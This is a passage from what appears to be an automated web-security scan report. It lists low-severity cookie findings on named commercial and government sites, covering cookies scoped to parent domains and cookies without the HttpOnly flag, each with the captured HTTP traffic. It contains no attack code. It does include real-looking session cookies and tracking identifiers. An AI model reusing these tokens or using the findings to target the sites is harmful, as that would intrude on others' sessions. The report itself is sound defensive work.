wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Tue, 12 Jul 2011 16:35:47 GMT


10.36. http://sales.liveperson.net/hc/57386690/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/57386690/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagInPage&lpCallId=308320658747-492943215649&protV=20&lpjson=1&page=http%3A//www.homedepot.com/&id=7510587419&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-global-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=265974457269152000; HumanClickSiteContainerID_57386690=STANDALONE; LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDQAQCCBQS=IPKCCCKDEINMHCPDPDNCPOFP; HumanClickACTIVE=1310488554952

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
Set-Cookie: LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:36:05 GMT; path=/hc/57386690; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jul 2011 16:36:05 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"308320658747-492943215649","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

10.37. http://store.popcap.com/cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.popcap.com
Path:   /cart.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cart.php?a=a1&oid=11464&icid=bwbundle_HP_PLARGE_pc_EN HTTP/1.1
Host: store.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; lv=1310503202; user_profile=003000000000000; s_cc=true; __utmb=163442877; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DInformation%252520%25253E%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//store.popcap.com/cart.php%25253Fa%25253Da1%252526oid%25253D11464%252526icid%25253Dbwbundle_HP_PLARGE_pc_EN%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 20:48:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lv=1310503701; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Location: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 0


10.38. https://store.popcap.com/payment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /payment.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /payment.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; __utmb=163442877; lv=1310503702; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DCommerce%252520%25253E%252520Cart%2526pidt%253D1%2526oid%253Dhttps%25253A//store.popcap.com/payment.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:48:32 GMT
Server: Apache
Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...

10.39. http://www.burstnet.com/enlightn/3599//E519/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/3599//E519/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3599//E519/?1310503191 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.40. http://www.burstnet.com/enlightn/3893//392A/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/3893//392A/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3893//392A/?1310503167 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:28 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.41. http://www.burstnet.com/enlightn/5158//2CB4/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/5158//2CB4/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/5158//2CB4/?1310503209 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.42. http://www.burstnet.com/enlightn/8117//3E06/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.43. http://www.burstnet.com/enlightn/8171/99D2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8171/99D2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171/99D2/?01AD=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q&01RI=364AB5B4B4DE32D&01NA= HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:27 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; expires=Tue, 09-Aug-2011 20:39:27 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd; path=/; expires=Thu, 12-Jul-2012 20:39:27 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

10.44. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA; CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYl5,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYl5,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYl5,34698,00000,34506,00000; RQ=3763,5JCcZ,3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3281,5JD0W,3677,53bro,3678,53c1h,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,53c1h,1478,5OYl5,1513,5OYl5,1514,53bro,1515,5OYl5,2398,53bro,2570,53c1h,1267,53br0,2831,5OYl5,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,58T8w,3491,5JDlu,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; YU=3e170243b30558bee730f315249abaeb-5OYl5

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 1473
Connection: close
Set-Cookie: CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYlT,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYlT,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT
Set-Cookie: RQ=3763,5JCcZ,3151,57rv5,3173,5OYlT,3190,5OYlT,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYlT,1267,53br0,2831,5OYl5,2848,5OYlT,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,5OYlT,2921,5OYlT,2887,53br0,3468,53br2,1042,5OYlT,1182,5OYlT,1271,5OYlT,1273,5OYlT,1286,5OYlT,1339,5OYlT,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,5OYlT,3491,5JDlu,3387,5OYlT,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&amp;id=43&amp;r=&amp;rnd=1310503191" alt="" border="0" width=
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 376 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://511.dot.ri.gov/hb/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://511.dot.ri.gov
Path:   /hb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hb/ HTTP/1.1
Host: 511.dot.ri.gov
Proxy-Connection: keep-alive
Referer: http://www2.tmc.state.ri.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; RhodeIslandNGWeb=1679163402.20480.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=7AAAE4CFA20D02FA44A642301503BF8A; Path=/hb
Location: http://511.dot.ri.gov/hb/main.jsf
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 13 Jul 2011 00:33:05 GMT


11.2. https://iblogin.jpmorgan.com/sso/action/federateLogin

Summary

Severity:   Low
Confidence:   Firm
Host:   https://iblogin.jpmorgan.com
Path:   /sso/action/federateLogin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A6CB0EFBC048F9424BECBC81EE443A5; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: JSESSIONID=C3F5993BDA54ECF5782ED241F20F3239; Path=/sso; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16407


                   <SCRIPT type="t